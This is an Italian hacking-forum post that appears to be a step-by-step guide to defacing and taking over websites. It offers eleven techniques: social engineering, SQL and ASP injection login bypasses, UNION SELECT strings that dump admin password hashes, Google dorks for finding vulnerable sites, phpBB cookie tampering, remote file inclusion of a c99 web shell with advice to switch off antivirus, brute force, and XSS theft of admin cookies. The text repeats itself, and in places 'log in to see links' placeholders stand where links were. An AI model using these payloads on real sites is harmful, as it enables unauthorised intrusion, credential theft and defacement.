- 21 Gennaio 2011
- 208
- 0
- Miglior risposta
- 0
Incominciamo iniziando dalla tecnica più basilare fino ad arrivare a quella "suprema" XD
Ricordo: SEMPRE proxaty!!
- PRIMA TECNICA
Social Engineering:
Si sar? una tecnica semplice da apprendere ma ci vuole anche certa classe per convincere il Founder a farvi membro dello staff nel foro. Non c'? molta da sapere, soltanto bisogna essere furbi e svegli.
Esempio:
IO: ciao founder ho visto il tuo forum. devo dire che ? molto bello per? la skin non ? che sia il massimo. io sono un grafico e te la potrei cambiare con una migliore.
VITTIMA FOUNDER: Mi devo fidare? Posta tanto sul forum e ti faremo staff....
..Dopo che abbiamo postato molto ritorniamo da lui.
IO: Ho fatto come hai chiesto
VITTIMA FOUNDER: Perfetto sei admin grafico, cambiami questa schifo di skin.
Semplice, no?
- SECONDA TECNICA
SQL INJECTION:
La SQL injection ? una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL (Wikipedia)
Quindi, presentiamoci davanti al login dell'admin e scriviamo:
Username: ?or??=?
Password: ?or??=?
Questo ? solo un esempio, ci sono molte altre query simile. Se non funziona in questo modo attacchiamo il sito dall barra degli indirizzi:
Potete usare anche
Potremo anche utilizzare degli exploit che contengono una stringa SQL Injection nel Form del Search. Scriviamo nel modulo cerca questa stringa:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* e avremo le pwd in md5.
E' anche abbastanza famoso il bug che avvolge il modulo Top10:
Search, Top10 e ora barra degli indirizzi.
- TERZA TECNICA
ASP INJECTION: Simile alle SQL Injection solo che useremo questa tecnica quando ci ritroveremo di fronte a siti costruti in piattaforma .asp
Davanti al login utente scriviamo le seguenti query:
Utente senza registrazione
- UserName:? ----------> apostrofo snz spazio?
- Password: ----------> nessuna password, lasciate vuoto?
Scoprire la password dell?amministratore
UserName: ' union select Password,1,1,1 from members where UserID = 'admin'-
Password: ----------> nessuna password?
Diventare automaticamente amministratori?
UserName: admin' -
Password ---------> nessuna pass
Diventare il primo utente nella lista degli utenti!!!
UserName: ' or 0=0 --sp_password
Password: --------> nessuna pass anche stavolta!
QUARTA TECNICA
GuestBook: Un altro modo per defacciare pu? essere tramite il guestbook di un sito/forum.
Il Guestbook ? un'utilit? interattiva che permette ai visitatori di un sito web di poter lasciare firme e commenti.
Scriviamo questa query nella text box del motore di ricerca + famoso al mondo, Google:
CODICE
inurl:?guestbook/admin/login.php?
Cercate un po' tra i vari siti/forum che si aprono tutti sulla pagina del login..
Una volta trovato quello interessato nel campo dell'Username inseriamo:
CODICE
'or 'jr7'='jr7' /*
Cercate un po' tra i vari siti/forum che si aprono tutti sulla pagina del login..
Una volta trovato quello interessato nel campo dell'Username inseriamo:
CODICE
'or 'jr7'='jr7' /*
...mentre nel campo dell Password ne mettiamo una a nostra piacere...
Se il sito ? vulnerabile siamo padroni del sito/forum!
NO LAMERATE!
- QUINTA TECNICA
MKPortal + vBulletin 3.5.4: Scrivete questa stringa su google "Powered by mkportal vbulletin 3.5.4" senz'apici e trovate un sito vulnerabile (rarissimi)....
Una volta trovato inserite questo codice all'url "ind=',userid='1" senz'apici cos? il risultato sar?:
Codice PHP:
Se tutti ? andato a buon fine siete admin del sito..
Se "refresshate" (nuovo mio termine *LOL*) la pagina ritornate un utente qualsiasi..
- SESTA TECNICA
Cookie Manipulation: Con questa tecnica ci concentreremo sui forum PhpBB e PhpBB2. Esiste un exploit "semplice" che ci permette di diventare root in forum. Ah, per compiere questa tecnica ? meglio se avete come browser Mozilla Firefox
Cercate su Google "Powered By phpBB 1.0.12."
Trovate un sito vulnerabile e state fermi nella homepage dle forum..
Vai su C:/Documents and Settings/Vostro computer/Dati e applicazioni/Mozilla firefox/"la cartella quella con numeri e lettere" andate su ?COOKIE.TXT? e pigiate "CTRL+T". Ora nella ricerca inserirete il sito che dovreste defacciare... quando cerca se trovate "phpbb2mysql_data" vuol dire che il sito ? vulnerabile (ma non certamente) individuate il "codice guest" e se spunta "a%3A07B" modificatelo con "a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622us erid % 22%3A1222%227D" (se troverete gi? questo codice guest il sito non sar? vulnerabile)
..adesso rientrate nel sito e magicamente DOVRESTE essere amministratori....
Guida da SERIOUS
Io ho un po' modificato questa guida..non si capiva granch? XD
Ricordo che con alcuni questa tecnica pu? anche fallire..Perch?? perch? molti (tipo me) non hanno la cartella Dati e applicazioni/Mozilla Firefox
SETTIMA TECNICA
Powered by FrontPage: Queste due stringhe, se inserite correttamente nella barra degli indirizzi ci mostreranno le pass degli admin.
alternativamente
OTTAVA TECNICA
JPORTAL: Scrivete su google "Poweredby jportal. Vi usciranno una miriade di pagine tra cui ci potr? essere un sito vulnerabile, no?
Nella barra degli indirizzi, dov'? c'? scritto
Codice PHP:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Vedete la X? Ecco l? dovete inserire o il numero 1 o il numero 2. Ovviamente dopo premiavo invio. Se il bug non ? stato fixato vedremo le pass degli admin NON hashate
NONA TECNICA
Brute force: Metodo D-I-S-P-E-R-A-T-O. E' molto semplice da utilizzare. Consiste nel scaricare un programmino, inserire il link del sito vittima e vedere se riesce a crakkare la password. Praticamente prova tutte le combinazioni fino a trovare la pwd dell'FTP. Per avere più possibilit? ? necessario allegarci un dizionario cos? il brute force avr? più parole da "mangiare"
DECIMA TECNICA
REMOTE FILE INCLUDE: Cos'? una shell e come si utilizza.
Una shell ? un "ambiente di lavoro" strutturata specialmente in PHP che sfrutta il bug dell'autoiniezione. Da questo viene fuori la tecnica dell'RFI.
Cosa ci dice Wikipedia?
In un sistema operativo, la shell ? il programma che permette agli utenti di comunicare con il
sistema e di avviare i programmi. ? una delle componenti principali di un sistema operativo, insieme al kernel.
La shell ? l'"ambiente di lavoro" attraverso il quale ? possibile impartire al computer comandi, richiedendo l'esecuzione di programmi.
Ci sono molti tipi di shell che possono essere testuali e grafiche ma questo non c'importa.
Iniziamo. Hostiamo la nostra shell c99 su un free hosting (oppure usate cuteFTP che uploada da pc locale a web) con l'enstensione .php che funger? da CLIENT. Poi uppate ancora questa shell in formato .txt in un altro dominio web, che funger? da SERVER.
Ora dobbiamo aggiungere alla variabile buggata del sitovittima l'URL della shellc99.txt
Esempio:
Sempre se il sito ? vulnerabile, aggiornate la shell.php e avrete tutti i file che compongono il sito.
Specialmente dovreste trovare il file config.php dove troverete tutti i dati per entrare nel db
LINK C99: QUI
P.S. Disattivate l'antivirus perch? se no ve lo rileva come codice maligno in PHP.
Qua quasi tutti gli exploit:
Dov'? c'? scritto [evil_scripts] dovete inserire il link in cui ? hostata la shell c99
UNDICESIMA TECNICA
Cross Site Scripting:Questa tecnica, chiamata anche XSS, ? una vulnerabilit? che avvolge websites con scarso controllo di variabili derivate da input dell'utente . In questo modo si pu? modificare la sorgente di una pagina grabbando i cookie dell'admin. Si inietta codice javascript maligno o nella barra degli indirizzi o nel modulo Search.
<script>alert(/quel che ti pare/)</script> permette di far apparire un semplice alert in javascript con dentro la frase che hai scelto.
<script>(document.cookie)</script> grabba i TUOI cookie ma come fare per grabbare i cookie dell'admin?
Per trovare siti vulnerabili si pu? usare questa dork: inurl:"index.php/page="
se il sito vittima ?
Per i cookie dell'admin dobbiamo fare un semplice redirect che appunto redirecta l'admin al nostro cookie grabber.
Redirect:
Ricordo: SEMPRE proxaty!!
- PRIMA TECNICA
Social Engineering:
Si sar? una tecnica semplice da apprendere ma ci vuole anche certa classe per convincere il Founder a farvi membro dello staff nel foro. Non c'? molta da sapere, soltanto bisogna essere furbi e svegli.
Esempio:
IO: ciao founder ho visto il tuo forum. devo dire che ? molto bello per? la skin non ? che sia il massimo. io sono un grafico e te la potrei cambiare con una migliore.
VITTIMA FOUNDER: Mi devo fidare? Posta tanto sul forum e ti faremo staff....
..Dopo che abbiamo postato molto ritorniamo da lui.
IO: Ho fatto come hai chiesto
VITTIMA FOUNDER: Perfetto sei admin grafico, cambiami questa schifo di skin.
Semplice, no?
- SECONDA TECNICA
SQL INJECTION:
La SQL injection ? una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL (Wikipedia)
Quindi, presentiamoci davanti al login dell'admin e scriviamo:
Username: ?or??=?
Password: ?or??=?
Questo ? solo un esempio, ci sono molte altre query simile. Se non funziona in questo modo attacchiamo il sito dall barra degli indirizzi:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
. Se tutto ? andato a buon fine ci ritroveremo le password degli admin criptate in MD5.Potete usare anche
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
oppure Perfavore,
Entra
oppure
Registrati
per vedere i Link!
.Potremo anche utilizzare degli exploit che contengono una stringa SQL Injection nel Form del Search. Scriviamo nel modulo cerca questa stringa:
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* e avremo le pwd in md5.
E' anche abbastanza famoso il bug che avvolge il modulo Top10:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
.Search, Top10 e ora barra degli indirizzi.
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
. Se vedremo come risultato "Selection from the databse failed!" siamo dentro? L'unica cosa che ci resta da fare ? creare un user con privilegi da admin.Perfavore,
Entra
oppure
Registrati
per vedere i Link!
. Premendo invio avremo creato un nuovo account con poteri illimitati.- TERZA TECNICA
ASP INJECTION: Simile alle SQL Injection solo che useremo questa tecnica quando ci ritroveremo di fronte a siti costruti in piattaforma .asp
Davanti al login utente scriviamo le seguenti query:
Utente senza registrazione
- UserName:? ----------> apostrofo snz spazio?
- Password: ----------> nessuna password, lasciate vuoto?
Scoprire la password dell?amministratore
UserName: ' union select Password,1,1,1 from members where UserID = 'admin'-
Password: ----------> nessuna password?
Diventare automaticamente amministratori?
UserName: admin' -
Password ---------> nessuna pass
Diventare il primo utente nella lista degli utenti!!!
UserName: ' or 0=0 --sp_password
Password: --------> nessuna pass anche stavolta!
QUARTA TECNICA
GuestBook: Un altro modo per defacciare pu? essere tramite il guestbook di un sito/forum.
Il Guestbook ? un'utilit? interattiva che permette ai visitatori di un sito web di poter lasciare firme e commenti.
Scriviamo questa query nella text box del motore di ricerca + famoso al mondo, Google:
CODICE
inurl:?guestbook/admin/login.php?
Cercate un po' tra i vari siti/forum che si aprono tutti sulla pagina del login..
Una volta trovato quello interessato nel campo dell'Username inseriamo:
CODICE
'or 'jr7'='jr7' /*
Cercate un po' tra i vari siti/forum che si aprono tutti sulla pagina del login..
Una volta trovato quello interessato nel campo dell'Username inseriamo:
CODICE
'or 'jr7'='jr7' /*
...mentre nel campo dell Password ne mettiamo una a nostra piacere...
Se il sito ? vulnerabile siamo padroni del sito/forum!
NO LAMERATE!
- QUINTA TECNICA
MKPortal + vBulletin 3.5.4: Scrivete questa stringa su google "Powered by mkportal vbulletin 3.5.4" senz'apici e trovate un sito vulnerabile (rarissimi)....
Una volta trovato inserite questo codice all'url "ind=',userid='1" senz'apici cos? il risultato sar?:
Codice PHP:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Se tutti ? andato a buon fine siete admin del sito..
Se "refresshate" (nuovo mio termine *LOL*) la pagina ritornate un utente qualsiasi..
- SESTA TECNICA
Cookie Manipulation: Con questa tecnica ci concentreremo sui forum PhpBB e PhpBB2. Esiste un exploit "semplice" che ci permette di diventare root in forum. Ah, per compiere questa tecnica ? meglio se avete come browser Mozilla Firefox
Cercate su Google "Powered By phpBB 1.0.12."
Trovate un sito vulnerabile e state fermi nella homepage dle forum..
Vai su C:/Documents and Settings/Vostro computer/Dati e applicazioni/Mozilla firefox/"la cartella quella con numeri e lettere" andate su ?COOKIE.TXT? e pigiate "CTRL+T". Ora nella ricerca inserirete il sito che dovreste defacciare... quando cerca se trovate "phpbb2mysql_data" vuol dire che il sito ? vulnerabile (ma non certamente) individuate il "codice guest" e se spunta "a%3A07B" modificatelo con "a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622us erid % 22%3A1222%227D" (se troverete gi? questo codice guest il sito non sar? vulnerabile)
..adesso rientrate nel sito e magicamente DOVRESTE essere amministratori....
Guida da SERIOUS
Io ho un po' modificato questa guida..non si capiva granch? XD
Ricordo che con alcuni questa tecnica pu? anche fallire..Perch?? perch? molti (tipo me) non hanno la cartella Dati e applicazioni/Mozilla Firefox
SETTIMA TECNICA
Powered by FrontPage: Queste due stringhe, se inserite correttamente nella barra degli indirizzi ci mostreranno le pass degli admin.
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
alternativamente
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
OTTAVA TECNICA
JPORTAL: Scrivete su google "Poweredby jportal. Vi usciranno una miriade di pagine tra cui ci potr? essere un sito vulnerabile, no?
Nella barra degli indirizzi, dov'? c'? scritto
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
AGGIUNGEREMO questo codice:Codice PHP:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
Vedete la X? Ecco l? dovete inserire o il numero 1 o il numero 2. Ovviamente dopo premiavo invio. Se il bug non ? stato fixato vedremo le pass degli admin NON hashate
NONA TECNICA
Brute force: Metodo D-I-S-P-E-R-A-T-O. E' molto semplice da utilizzare. Consiste nel scaricare un programmino, inserire il link del sito vittima e vedere se riesce a crakkare la password. Praticamente prova tutte le combinazioni fino a trovare la pwd dell'FTP. Per avere più possibilit? ? necessario allegarci un dizionario cos? il brute force avr? più parole da "mangiare"
DECIMA TECNICA
REMOTE FILE INCLUDE: Cos'? una shell e come si utilizza.
Una shell ? un "ambiente di lavoro" strutturata specialmente in PHP che sfrutta il bug dell'autoiniezione. Da questo viene fuori la tecnica dell'RFI.
Cosa ci dice Wikipedia?
In un sistema operativo, la shell ? il programma che permette agli utenti di comunicare con il
sistema e di avviare i programmi. ? una delle componenti principali di un sistema operativo, insieme al kernel.
La shell ? l'"ambiente di lavoro" attraverso il quale ? possibile impartire al computer comandi, richiedendo l'esecuzione di programmi.
Ci sono molti tipi di shell che possono essere testuali e grafiche ma questo non c'importa.
Iniziamo. Hostiamo la nostra shell c99 su un free hosting (oppure usate cuteFTP che uploada da pc locale a web) con l'enstensione .php che funger? da CLIENT. Poi uppate ancora questa shell in formato .txt in un altro dominio web, che funger? da SERVER.
Ora dobbiamo aggiungere alla variabile buggata del sitovittima l'URL della shellc99.txt
Esempio:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Sempre se il sito ? vulnerabile, aggiornate la shell.php e avrete tutti i file che compongono il sito.
Specialmente dovreste trovare il file config.php dove troverete tutti i dati per entrare nel db
LINK C99: QUI
P.S. Disattivate l'antivirus perch? se no ve lo rileva come codice maligno in PHP.
Qua quasi tutti gli exploit:
Dov'? c'? scritto [evil_scripts] dovete inserire il link in cui ? hostata la shell c99
UNDICESIMA TECNICA
Cross Site Scripting:Questa tecnica, chiamata anche XSS, ? una vulnerabilit? che avvolge websites con scarso controllo di variabili derivate da input dell'utente . In questo modo si pu? modificare la sorgente di una pagina grabbando i cookie dell'admin. Si inietta codice javascript maligno o nella barra degli indirizzi o nel modulo Search.
<script>alert(/quel che ti pare/)</script> permette di far apparire un semplice alert in javascript con dentro la frase che hai scelto.
<script>(document.cookie)</script> grabba i TUOI cookie ma come fare per grabbare i cookie dell'admin?
Per trovare siti vulnerabili si pu? usare questa dork: inurl:"index.php/page="
se il sito vittima ?
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
andremo a inserire la nostra xss quindi www.sitovittima.it/index.php/page<script>(document.cookie)</script> vedremo un alert con i nostri cookie e il nostro SID.Per i cookie dell'admin dobbiamo fare un semplice redirect che appunto redirecta l'admin al nostro cookie grabber.
Redirect:
PHP:
Perfavore,
Entra
oppure
Registrati
per vedere i codici!
